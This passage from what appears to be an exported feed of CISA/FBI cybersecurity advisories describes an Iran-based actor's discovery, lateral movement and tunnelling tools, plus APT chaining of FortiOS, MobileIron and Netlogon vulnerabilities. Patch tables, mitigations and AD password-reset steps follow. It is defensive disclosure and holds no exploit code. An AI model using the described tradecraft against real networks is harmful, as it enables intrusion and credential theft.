\n \n#### Discovery\n\nCISA observed the threat actor using the techniques identified in table 7 to learn more about the victim environments.\n\n_Table 7: Discovery techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1018](<https://attack.mitre.org/techniques/T1018/>)\n\n| Remote System Discovery | The threat actor used Angry IP Scanner to detect remote systems. \n \n[T1083](<https://attack.mitre.org/techniques/T1083/>)\n\n| File and Directory Discovery | The threat actor used WizTree to obtain network files and directory listings. \n \n[T1087](<https://attack.mitre.org/techniques/T1087/>)\n\n| Account Discovery | The threat actor accessed `ntuser.dat` and `UserClass.dat` and used Softerra LDAP Browser to browse documentation for service accounts. \n \n[T1217](<https://attack.mitre.org/techniques/T1217/>)\n\n| Browser Bookmark Discovery | The threat actor used Google Chrome bookmarks to find internal resources and assets. \n \n#### Lateral Movement\n\nCISA also observed the threat actor using open-source tools such as Plink and TightVNC for lateral movement. CISA observed the threat actor using the techniques identified in table 8 for lateral movement within the victim environment.\n\n_Table 8: Lateral movement techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1021](<https://attack.mitre.org/techniques/T1021/>)\n\n| Remote Services | The threat actor used RDP with valid account credentials for lateral movement in the environment. \n \n[T1021.001](<https://attack.mitre.org/techniques/T1021/001/>)\n\n| Remote Services: Remote Desktop Protocol | The threat actor used RDP to log in and then conduct lateral movement. \n \n[T1021.002](<https://attack.mitre.org/techniques/T1021/002/>)\n\n| Remote Services: SMB/Windows Admin Shares | The threat actor used PsExec and PSEXECSVC pervasively on several hosts. The threat actor was also observed using a valid account to access SMB shares. 
\n \n[T1021.004](<https://attack.mitre.org/techniques/T1021/004/>)\n\n| Remote Services: SSH | The threat actor used Plink and PuTTY for lateral movement. Artifacts of Plink were used for encrypted sessions in the system registry hive. \n \n[T1021.005](<https://attack.mitre.org/techniques/T1021/005/>)\n\n| Remote Services: Virtual Network Computing (VNC) | The threat actor installed TightVNC server and client pervasively on compromised servers and endpoints in the network environment as a lateral movement tool. \n \n[T1563.002](<https://attack.mitre.org/techniques/T1563/002/>)\n\n| Remote Service Session Hijacking: RDP Hijacking | The threat actor likely hijacked a legitimate RDP session to move laterally within the network environment. \n \n#### Collection\n\nCISA observed the threat actor using the techniques identified in table 9 for collection within the victim environment.\n\n_Table 9: Collection techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1005](<https://attack.mitre.org/techniques/T1005/>)\n\n| Data from Local System | The threat actor searched local system sources to access sensitive documents. \n \n[T1039](<https://attack.mitre.org/techniques/T1039/>)\n\n| Data from Network Shared Drive | The threat actor searched network shares to access sensitive documents. \n \n[T1213](<https://attack.mitre.org/techniques/T1213/>)\n\n| Data from Information Repositories | The threat actor accessed victim security/IT monitoring environments, Microsoft Teams, etc., to mine valuable information. \n \n[T1530](<https://attack.mitre.org/techniques/T1530/>)\n\n| Data from Cloud Storage Object | The threat actor obtained files from the victim cloud storage instances. \n \n[T1560.001](<https://attack.mitre.org/techniques/T1560/001/>)\n\n| Archive Collected Data: Archive via Utility | The threat actor used 7-Zip to archive data. 
\n \n#### Command and Control\n\nCISA observed the threat actor using the techniques identified in table 10 for command and control (C2).\n\n_Table 10: Command and control techniques_\n\nID\n\n| \n\nTechnique/Sub-Technique\n\n| \n\nContext \n \n---|---|--- \n \n[T1071.001](<https://attack.mitre.org/techniques/T1071/001/>)\n\n| Application Layer Protocol: Web Protocols | The threat actor used various web mechanisms and protocols, including the web shells listed in table 1. \n \n[T1105](<https://attack.mitre.org/techniques/T1105/>)\n\n| Ingress Tool Transfer | The threat actor downloaded tools such as PsExec directly to endpoints and downloaded web shells and scripts to NetScaler in base64-encoded schemes. \n \n[T1572](<https://attack.mitre.org/techniques/T1572/>)\n\n| Protocol Tunneling | The threat actor used `FRPC.exe` to tunnel RDP over port 443. The threat actor has also been observed using ngrok for tunneling. \n \n#### Exfiltration\n\nCISA currently has no evidence of data exfiltration from this threat actor but assesses that it was likely due to the use of 7-Zip and viewing of sensitive documents.\n\n### Mitigations\n\n#### Recommendations\n\nCISA and FBI recommend implementing the following recommendations.\n\n * If your organization has not patched for the Citrix CVE-2019-19781 vulnerability, and a compromise is suspected, follow the recommendations in CISA Alert [AA20-031A](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>).\n * This threat actor has been observed targeting other CVEs mentioned in this report; follow the recommendations in the CISA resources provided below.\n * If using Windows Active Directory and compromise is suspected, conduct remediation of the compromised Windows Active Directory forest. 
\n * If compromised, rebuild/reimage compromised NetScaler devices.\n * Routinely audit configuration and patch management programs.\n * Monitor network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., SSH, SMB, RDP).\n * Implement multi-factor authentication, especially for privileged accounts.\n * Use separate administrative accounts on separate administration workstations.\n * Implement the principle of least privilege on data access.\n * Secure RDP and other remote access solutions using multifactor authentication and \u201cjump boxes\u201d for access.\n * Deploy endpoint defense tools on all endpoints; ensure they work and are up to date.\n * Keep software up to date.\n\n### Contact Information\n\nTo report suspicious or criminal activity related to information found in this Joint Cybersecurity Advisory, contact your local FBI field office at [www.fbi.gov/contact-us/field](<https://www.fbi.gov/contact-us/field-offices>), or the FBI\u2019s 24/7 Cyber Watch (CyWatch) at (855) 292-3937 or by e-mail at [CyWatch@fbi.gov](<mailto:%20CyWatch@fbi.gov>). When available, please include the following information regarding the incident: date, time, and location of the incident; type of activity; number of people affected; type of equipment used for the activity; the name of the submitting company or organization; and a designated point of contact. 
To request incident response resources or technical assistance related to these threats, contact CISA at [central@cisa.dhs.gov](<mailto:%20Central@cisa.dhs.gov>).\n\n### Resources\n\n[CISA Alert AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>) \n[CISA Alert AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>) \n[CISA Alert AA20-107A: Continued Threat Actor Exploitation Post Pulse Secure VPN Patching](<https://us-cert.cisa.gov/ncas/alerts/aa20-107a>) \n[CISA Alert AA20-206A: Threat Actor Exploitation of F5 BIG-IP CVE-2020-5902](<https://us-cert.cisa.gov/ncas/alerts/aa20-206a>) \n[CISA Security Tip: Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>)\n\n### Revisions\n\nSeptember 15, 2020: Initial Version\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2020-09-15T12:00:00", "type": "ics", "title": "Iran-Based Threat Actor Exploits VPN Vulnerabilities", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2019-11510", "CVE-2019-11539", "CVE-2019-19781", "CVE-2020-5902"], "modified": 
"2020-09-15T12:00:00", "id": "AA20-259A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-259a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T17:29:50", "description": "### Summary\n\n_This joint cybersecurity advisory uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. See the [ATT&CK for Enterprise](<https://attack.mitre.org/versions/v7/matrices/enterprise/>) framework for all referenced threat actor techniques._\n\n**Note:** the analysis in this joint cybersecurity advisory is ongoing, and the information provided should not be considered comprehensive. The Cybersecurity and Infrastructure Security Agency (CISA) will update this advisory as new information is available.\n\nThis joint cybersecurity advisory was written by CISA with contributions from the Federal Bureau of Investigation (FBI). \n\nCISA has recently observed advanced persistent threat (APT) actors exploiting multiple legacy vulnerabilities in combination with a newer privilege escalation vulnerability\u2014[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>)\u2014in Windows Netlogon. The commonly used tactic, known as vulnerability chaining, exploits multiple vulnerabilities in the course of a single intrusion to compromise a network or application. \n\nThis recent malicious activity has often, but not exclusively, been directed at federal and state, local, tribal, and territorial (SLTT) government networks. Although it does not appear these targets are being selected because of their proximity to elections information, there may be some risk to elections information housed on government networks.\n\nCISA is aware of some instances where this activity resulted in unauthorized access to elections support systems; however, CISA has no evidence to date that integrity of elections data has been compromised. 
There are steps that election officials, their supporting SLTT IT staff, and vendors can take to help defend against this malicious cyber activity.\n\nSome common tactics, techniques, and procedures (TTPs) used by APT actors include leveraging legacy network access and virtual private network (VPN) vulnerabilities in association with the recent critical [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon vulnerability. CISA is aware of multiple cases where the Fortinet FortiOS Secure Socket Layer (SSL) VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) has been exploited to gain access to networks. To a lesser extent, CISA has also observed threat actors exploiting the MobileIron vulnerability [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>). While these exploits have been observed recently, this activity is ongoing and still unfolding.\n\nAfter gaining initial access, the actors exploit [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to compromise all Active Directory (AD) identity services. Actors have then been observed using legitimate remote access tools, such as VPN and Remote Desktop Protocol (RDP), to access the environment with the compromised credentials. 
Observed activity targets multiple sectors and is not limited to SLTT entities.\n\nCISA recommends network staff and administrators review internet-facing infrastructure for these and similar vulnerabilities that have or could be exploited to a similar effect, including Juniper [CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>), Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>), Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>), and Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) (this list is not considered exhaustive).\n\n### Technical Details\n\n### Initial Access\n\nAPT threat actors are actively leveraging legacy vulnerabilities in internet-facing infrastructure (_Exploit Public-Facing Application_ [[T1190](<https://attack.mitre.org/versions/v7/techniques/T1190/>)], _External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to gain initial access into systems. The APT actors appear to have predominantly gained initial access via the Fortinet FortiOS VPN vulnerability [CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>).\n\nAlthough not observed in this campaign, other vulnerabilities, listed below, could be used to gain network access (as analysis is evolving, these listed vulnerabilities should not be considered comprehensive). 
As a best practice, it is critical to patch all known vulnerabilities within internet-facing infrastructure.\n\n * Citrix NetScaler [CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>)\n * MobileIron [CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>)\n * Pulse Secure [CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>)\n * Palo Alto Networks [CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>)\n * F5 BIG-IP [CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>)\n\n#### Fortinet FortiOS SSL VPN CVE-2018-13379\n\n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) is a path traversal vulnerability in the FortiOS SSL VPN web portal. An unauthenticated attacker could exploit this vulnerability to download FortiOS system files through specially crafted HTTP resource requests.[[1](<https://www.fortiguard.com/psirt/FG-IR-18-384>)]\n\n### MobileIron Core & Connector Vulnerability CVE-2020-15505\n\n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) is a remote code execution vulnerability in MobileIron Core & Connector versions 10.3 and earlier.[[2](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)] This vulnerability allows an external attacker, with no privileges, to execute code of their choice on the vulnerable system. As mobile device management (MDM) systems are critical to configuration management for external devices, they are usually highly permissioned and make a valuable target for threat actors.\n\n### Privilege Escalation\n\nPost initial access, the APT actors use multiple techniques to expand access to the environment. The actors are leveraging [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in Windows Netlogon to escalate privileges and obtain access to Windows AD servers. 
Actors are also leveraging open-source tools such as Mimikatz and CrackMapExec to obtain valid account credentials from AD servers (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]).\n\n#### Microsoft Netlogon Remote Protocol Vulnerability: CVE-2020-1472\n\n[CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) is a vulnerability in Microsoft Windows Netlogon Remote Protocol (MS-NRPC), a core authentication component of Active Directory.[[3](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)] This vulnerability could allow an unauthenticated attacker with network access to a domain controller to completely compromise all AD identity services (_Valid Accounts: Domain Accounts_ [[T1078.002](<https://attack.mitre.org/versions/v7/techniques/T1078/002/>)]). Malicious actors can leverage this vulnerability to compromise other devices on the network (_Lateral Movement_ [[TA0008](<https://attack.mitre.org/versions/v7/tactics/TA0008/>)]).\n\n### Persistence\n\nOnce system access has been achieved, the APT actors abuse legitimate credentials (_Valid Accounts_ [[T1078](<https://attack.mitre.org/versions/v7/techniques/T1078/>)]) to log in via VPN or remote access services (_External Remote Services_ [[T1133](<https://attack.mitre.org/versions/v7/techniques/T1133/>)]) to maintain persistence.\n\n### Mitigations\n\nOrganizations with externally facing infrastructure devices that have the vulnerabilities listed in this joint cybersecurity advisory, or other vulnerabilities, should move forward with an \u201cassume breach\u201d mentality. As initial exploitation and escalation may be the only observable exploitation activity, most mitigations will need to focus on more traditional network hygiene and user management activities.\n\n### Keep Systems Up to Date\n\nPatch systems and equipment promptly and diligently. 
Establishing and consistently maintaining a thorough patching cycle continues to be the best defense against adversary TTPs. See table 1 for patch information on CVEs mentioned in this report.\n\n_Table 1: Patch information for CVEs_\n\n**Vulnerability** | **Vulnerable Products** | **Patch Information** \n---|---|--- \n[CVE-2018-13379](<https://nvd.nist.gov/vuln/detail/CVE-2018-13379>) | \n\n * FortiOS 6.0: 6.0.0 to 6.0.4\n * FortiOS 5.6: 5.6.3 to 5.6.7\n * FortiOS 5.4: 5.4.6 to 5.4.12\n| \n\n * [Fortinet Security Advisory: FG-IR-18-384](<https://www.fortiguard.com/psirt/FG-IR-18-384>) \n[CVE-2019-19781](<https://nvd.nist.gov/vuln/detail/CVE-2019-19781>) | \n\n * Citrix Application Delivery Controller\n * Citrix Gateway\n * Citrix SDWAN WANOP\n| \n\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 11.1 and 12.0 ](<https://www.citrix.com/blogs/2020/01/19/vulnerability-update-first-permanent-fixes-available-timeline-accelerated/>)\n * [Citrix blog post: security updates for Citrix SD-WAN WANOP release 10.2.6 and 11.0.3](<https://www.citrix.com/blogs/2020/01/22/update-on-cve-2019-19781-fixes-now-available-for-citrix-sd-wan-wanop/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway versions 12.1 and 13.0](<https://www.citrix.com/blogs/2020/01/23/fixes-now-available-for-citrix-adc-citrix-gateway-versions-12-1-and-13-0/>)\n * [Citrix blog post: firmware updates for Citrix ADC and Citrix Gateway version 10.5](<https://www.citrix.com/blogs/2020/01/24/citrix-releases-final-fixes-for-cve-2019-19781/>) \n[CVE-2020-5902](<https://nvd.nist.gov/vuln/detail/CVE-2020-5902>) | \n\n * Big-IP devices (LTM, AAM, Advanced WAF, AFM, Analytics, APM, ASM, DDHD, DNS, FPS, GTM, Link Controller, PEM, SSLO, CGNAT)\n| \n\n * [F5 Security Advisory: K52145254: TMUI RCE vulnerability CVE-2020-5902](<https://support.f5.com/csp/article/K52145254>) \n[CVE-2019-11510](<https://nvd.nist.gov/vuln/detail/CVE-2019-11510>) | \n\n * Pulse Connect 
Secure 9.0R1 - 9.0R3.3, 8.3R1 - 8.3R7, 8.2R1 - 8.2R12, 8.1R1 - 8.1R15\n * Pulse Policy Secure 9.0R1 - 9.0R3.1, 5.4R1 - 5.4R7, 5.3R1 - 5.3R12, 5.2R1 - 5.2R12, 5.1R1 - 5.1R15\n| \n\n * [Pulse Secure Out-of-Cycle Advisory: Multiple vulnerabilities resolved in Pulse Connect Secure / Pulse Policy Secure 9.0RX](<https://kb.pulsesecure.net/articles/Pulse_Security_Advisories/SA44101>) \n[CVE-2020-15505](<https://nvd.nist.gov/vuln/detail/CVE-2020-15505>) | \n\n * MobileIron Core & Connector versions 10.3.0.3 and earlier, 10.4.0.0, 10.4.0.1, 10.4.0.2, 10.4.0.3, 10.5.1.0, 10.5.2.0 and 10.6.0.0 \n * Sentry versions 9.7.2 and earlier, and 9.8.0; \n * Monitor and Reporting Database (RDB) version 2.0.0.1 and earlier\n| \n\n * [MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>) \n[CVE-2020-1631](<https://nvd.nist.gov/vuln/detail/CVE-2020-1631>) | \n\n * Junos OS 12.3, 12.3X48, 14.1X53, 15.1, 15.1X49, 15.1X53, 17.2, 17.3, 17.4, 18.1, 18.2, 18.3, 18.4, 19.1, 19.2, 19.3, 19.4, 20.1\n| \n\n * [Juniper Security Advisory JSA11021](<https://kb.juniper.net/InfoCenter/index?page=content&id=JSA11021>) \n[CVE-2020-2021](<https://nvd.nist.gov/vuln/detail/CVE-2020-2021>) | \n\n * PAN-OS 9.1 versions earlier than PAN-OS 9.1.3; PAN-OS 9.0 versions earlier than PAN-OS 9.0.9; PAN-OS 8.1 versions earlier than PAN-OS 8.1.15, and all versions of PAN-OS 8.0 (EOL)\n| \n\n * [Palo Alto Networks Security Advisory for CVE-2020-2021](<https://security.paloaltonetworks.com/CVE-2020-2021>) \n[CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) | \n\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1\n * Windows Server 2008 R2 for x64-based Systems Service Pack 1 (Server Core installation)\n * Windows Server 2012\n * Windows Server 2012 (Server Core installation)\n * Windows Server 2012 R2\n * Windows Server 2016\n * Windows Server 2019\n * Windows Server 2019 (Server Core installation)\n * Windows 
Server, version 1903 (Server Core installation)\n * Windows Server, version 1909 (Server Core installation)\n * Windows Server, version 2004 (Server Core installation)\n| \n\n * [Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) \n \n### Comprehensive Account Resets\n\nIf [CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) Netlogon activity or other indications of valid credential abuse are detected, it should be assumed that the APT actors have compromised AD administrative accounts; the AD forest should not be fully trusted, and, therefore, a new forest should be deployed. Existing hosts from the old compromised forest cannot be migrated in without being rebuilt and rejoined to the new domain, but migration may be done through \u201ccreative destruction,\u201d wherein as endpoints in the legacy forest are decommissioned, new ones can be built in the new forest. This will need to be completed on on-premises as well as Azure-hosted AD instances.\n\nNote that fully resetting an AD forest is difficult and complex; it is best done with the assistance of personnel who have successfully completed the task previously.\n\nIt is critical to perform a full password reset on all user and computer accounts in the AD forest. Use the following steps as a guide.\n\n 1. Create a temporary administrator account, and use this account only for all administrative actions\n 2. Reset the Kerberos Ticket Granting Ticket (`krbtgt`) password [[4](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)]; this must be completed before any additional actions (a second reset will take place in step 5)\n 3. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 4. 
Reset all account passwords (passwords should be 15 characters or more and randomly assigned): \n\n 1. User accounts (forced reset with no legacy password reuse)\n 2. Local accounts on hosts (including local accounts not covered by Local Administrator Password Solution [LAPS])\n 3. Service accounts\n 4. Directory Services Restore Mode (DSRM) account\n 5. Domain Controller machine account\n 6. Application passwords\n 5. Reset the `krbtgt` password again\n 6. Wait for the `krbtgt` reset to propagate to all domain controllers (time may vary)\n 7. Reboot domain controllers\n 8. Reboot all endpoints\n\nThe following accounts should be reset:\n\n * AD Kerberos Authentication Master (2x)\n * All Active Directory Accounts\n * All Active Directory Admin Accounts\n * All Active Directory Service Accounts\n * All Active Directory User Accounts\n * DSRM Account on Domain Controllers\n * Non-AD Privileged Application Accounts\n * Non-AD Unprivileged Application Accounts\n * Non-Windows Privileged Accounts\n * Non-Windows User Accounts\n * Windows Computer Accounts\n * Windows Local Admin\n\n### CVE-2020-1472\n\nTo secure your organization\u2019s Netlogon channel connections:\n\n * **Update all Domain Controllers and Read Only Domain Controllers**. On August 11, 2020, Microsoft released [software updates](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>) to mitigate CVE-2020-1472. 
Applying this update to domain controllers is currently the only mitigation to this vulnerability (aside from removing affected domain controllers from the network).\n * **Monitor for new events, and address non-compliant devices** that are using vulnerable Netlogon secure channel connections.\n * **Block public access to potentially vulnerable ports**, such as 445 (Server Message Block [SMB]) and 135 (Remote Procedure Call [RPC]).\n\nTo protect your organization against this CVE, follow [advice from Microsoft](<https://support.microsoft.com/en-us/help/4557222/how-to-manage-the-changes-in-netlogon-secure-channel-connections-assoc>), including:\n\n * Update your domain controllers with an update released August 11, 2020, or later.\n * Find which devices are making vulnerable connections by monitoring event logs.\n * Address non-compliant devices making vulnerable connections.\n * Enable enforcement mode to address [CVE-2020-1472](<https://nvd.nist.gov/vuln/detail/CVE-2020-1472>) in your environment.\n\n### VPN Vulnerabilities\n\nImplement the following recommendations to secure your organization\u2019s VPNs:\n\n * **Update VPNs, network infrastructure devices, and devices** being used to remote into work environments with the latest software patches and security configurations. See CISA Tips [Understanding Patches and Software Updates](<https://us-cert.cisa.gov/ncas/tips/ST04-006>) and [Securing Network Infrastructure Devices](<https://us-cert.cisa.gov/ncas/tips/ST18-001>). Wherever possible, enable automatic updates. See table 1 for patch information on VPN-related CVEs mentioned in this report.\n * **Implement multi-factor authentication (MFA) on all VPN connections to increase security**. Physical security tokens are the most secure form of MFA, followed by authenticator app-based MFA. SMS and email-based MFA should only be used when no other forms are available. If MFA is not implemented, require teleworkers to use strong passwords. 
See CISA Tips [Choosing and Protecting Passwords](<https://us-cert.cisa.gov/ncas/tips/ST04-002>) and [Supplementing Passwords](<https://us-cert.cisa.gov/ncas/tips/ST05-012>) for more information.\n\nDiscontinue unused VPN servers. Reduce your organization\u2019s attack surface by discontinuing unused VPN servers, which may act as a point of entry for attackers. To protect your organization against VPN vulnerabilities:\n\n * **Audit** configuration and patch management programs.\n * **Monitor** network traffic for unexpected and unapproved protocols, especially outbound to the internet (e.g., Secure Shell [SSH], SMB, RDP).\n * **Implement** MFA, especially for privileged accounts.\n * **Use** separate administrative accounts on separate administration workstations.\n * **Keep** [software up to date](<https://us-cert.cisa.gov/ncas/tips/ST04-006>). Enable automatic updates, if available. \n\n### How to uncover and mitigate malicious activity\n\n * **Collect and remove** for further analysis: \n * Relevant artifacts, logs, and data.\n * **Implement** mitigation steps that avoid tipping off the adversary that their presence in the network has been discovered.\n * **Consider** soliciting incident response support from a third-party IT security organization to: \n * Provide subject matter expertise and technical support to the incident response.\n * Ensure that the actor is eradicated from the network.\n * Avoid residual issues that could result in follow-up compromises once the incident is closed.\n\n### Resources\n\n * [CISA VPN-Related Guidance](<https://www.cisa.gov/vpn-related-guidance>)\n * CISA Infographic: [Risk Vulnerability And Assessment (RVA) Mapped to the MITRE ATT&CK FRAMEWORK](<https://www.cisa.gov/sites/default/files/publications/Risk%20and%20Vulnerability%20Assessment%20%28RVA%29%20Mapped%20to%20the%20MITRE%20ATT%26amp%3BCK%20Framework%20Infographic_v6-100620_%20508.pdf>)\n * National Security Agency InfoSheet: [Configuring IPsec Virtual Private 
Networks](<https://media.defense.gov/2020/Jul/02/2002355501/-1/-1/0/CONFIGURING_IPSEC_VIRTUAL_PRIVATE_NETWORKS_2020_07_01_FINAL_RELEASE.PDF>)\n * CISA Joint Advisory: [AA20-245A: Technical Approaches to Uncovering and Remediating Malicious Activity](<https://us-cert.cisa.gov/ncas/alerts/aa20-245a>)\n * CISA Activity Alert: [AA20-073A: Enterprise VPN Security](<https://us-cert.cisa.gov/ncas/alerts/aa20-073a>)\n * CISA Activity Alert: [AA20-031A: Detecting Citrix CVE-2019-19781](<https://us-cert.cisa.gov/ncas/alerts/aa20-031a>)\n * CISA Activity Alert: [AA20-010A: Continued Exploitation of Pulse Secure VPN Vulnerability](<https://us-cert.cisa.gov/ncas/alerts/aa20-010a>)\n * **Cybersecurity Alerts and Advisories**: Subscriptions to [CISA Alerts](<https://public.govdelivery.com/accounts/USDHSUSCERT/subscriber/new>) and [MS-ISAC Advisories](<https://learn.cisecurity.org/ms-isac-subscription>)\n\n### Contact Information\n\nRecipients of this report are encouraged to contribute any additional information that they may have related to this threat.\n\nFor any questions related to this report or to report an intrusion and request resources for incident response or technical assistance, please contact:\n\n * CISA (888-282-0870 or [Central@cisa.dhs.gov](<mailto:Central@cisa.dhs.gov>)), or\n * The FBI through the FBI Cyber Division (855-292-3937 or [CyWatch@fbi.gov](<mailto:CyWatch@fbi.gov>)) or a [local field office](<https://www.fbi.gov/contact-us/field-offices/field-offices>)\n\n**_DISCLAIMER_**\n\n_This information is provided \"as is\" for informational purposes only. The United States Government does not provide any warranties of any kind regarding this information. 
In no event shall the United States Government or its contractors or subcontractors be liable for any damages, including but not limited to, direct, indirect, special or consequential damages, arising out of, resulting from, or in any way connected with this information, whether or not based upon warranty, contract, tort, or otherwise, whether or not arising out of negligence, and whether or not injury was sustained from, or arose out of the results of, or reliance upon the information._\n\n_The United States Government does not endorse any commercial product or service, including any subjects of analysis. Any reference to specific commercial products, processes, or services by service mark, trademark, manufacturer, or otherwise, does not constitute or imply their endorsement, recommendation, or favoring by the United States Government._\n\n### References\n\n[[1] Fortinet Advisory: FG-IR-18-384 ](<https://www.fortiguard.com/psirt/FG-IR-18-384>)\n\n[[2] MobileIron Blog: MobileIron Security Updates Available](<https://www.mobileiron.com/en/blog/mobileiron-security-updates-available>)\n\n[[3] Microsoft Security Advisory for CVE-2020-1472](<https://portal.msrc.microsoft.com/en-US/security-guidance/advisory/CVE-2020-1472>)\n\n[[4] Microsoft: AD Forest Recovery - Resetting the krbtgt password](<https://docs.microsoft.com/en-us/windows-server/identity/ad-ds/manage/ad-forest-recovery-resetting-the-krbtgt-password>)\n\n### Revisions\n\nOctober 9, 2020: Initial Version|October 11, 2020: Updated Summary|October 12, 2020: Added Additional Links\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": 
"2020-10-24T12:00:00", "type": "ics", "title": "APT Actors Chaining Vulnerabilities Against SLTT, Critical Infrastructure, and Elections Organizations", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-13379", "CVE-2019-11510", "CVE-2019-19781", "CVE-2020-1472", "CVE-2020-15505", "CVE-2020-1631", "CVE-2020-2021", "CVE-2020-5902"], "modified": "2020-10-24T12:00:00", "id": "AA20-283A", "href": "https://www.cisa.gov/news-events/cybersecurity-advisories/aa20-283a", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2023-12-03T21:07:16", "description": "### Summary\n\n_**Note:** This Activity Alert uses the MITRE Adversarial Tactics, Techniques, and Common Knowledge (ATT&CK\u00ae) framework. 
